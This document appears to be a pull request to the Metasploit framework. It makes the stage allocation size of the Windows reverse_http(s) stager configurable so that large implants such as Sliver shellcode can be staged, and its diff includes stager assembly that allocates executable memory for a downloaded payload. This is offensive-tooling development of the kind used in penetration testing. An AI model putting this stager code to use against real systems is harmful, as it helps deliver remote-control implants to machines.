### PR TITLE
Allow setting reverse_http(s) stagers shellcode size

### DIFF
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -84,6 +84,10 @@ module ReverseHttp
         ),
         OptBool.new('IgnoreUnknownPayloads',
           'Whether to drop connections from payloads using unknown UUIDs'
+        ),
+        OptInt.new('StagerStagePayloadSize',
+          'The size of the shellcode be staged in bytes',
+          default: 0x400000
         )
       ], Msf::Handler::ReverseHttp)
   end

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -40,7 +40,7 @@ module Payload::Windows::ReverseHttp
       port:        ds['LPORT'],
       retry_count: ds['StagerRetryCount'],
       retry_wait:  ds['StagerRetryWait'],
-      size:        ds['StagerStagePayloadSize'] || '0x400000'
+      size:        ds['StagerStagePayloadSize'] || 0x400000
     }
 
     # Add extra options if we have enough space

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -39,7 +39,8 @@ module Payload::Windows::ReverseHttp
       host:        ds['LHOST'] || '127.127.127.127',
       port:        ds['LPORT'],
       retry_count: ds['StagerRetryCount'],
-      retry_wait:  ds['StagerRetryWait']
+      retry_wait:  ds['StagerRetryWait'],
+      size:        ds['StagerStagePayloadSize'] || '0x400000'
     }
 
     # Add extra options if we have enough space
@@ -451,7 +452,7 @@ module Payload::Windows::ReverseHttp
     allocate_memory:
       push 0x40              ; PAGE_EXECUTE_READWRITE
       push 0x1000            ; MEM_COMMIT
-      push 0x00400000        ; Stage allocation (4Mb ought to do us)
+      push #{"0x%.8x" % opts[:size]} ; Stage allocation (4Mb ought to do us)
       push ebx               ; NULL as we dont care where the allocation is
       push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
       call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
@@ -515,4 +516,3 @@ module Payload::Windows::ReverseHttp
 end
 
 end
-


### PR DESCRIPTION
Adds the `ShellcodeSize` option to the reverse_http(s) payload options.

Useful for with large third-party shellcode (e.g. sliver shellcode which is a donut'd golang binary)

E.g. here is it working with sliver which serves a 16523988 byte shellcode:

![WindowsTerminal_HYMluNd27r](https://user-images.githubusercontent.com/20513519/161239691-fa36787b-dcab-4fa5-8639-b17107b9e145.gif)

## Verification

- [ ] Test reverse_http(s) payloads comms in usual way.



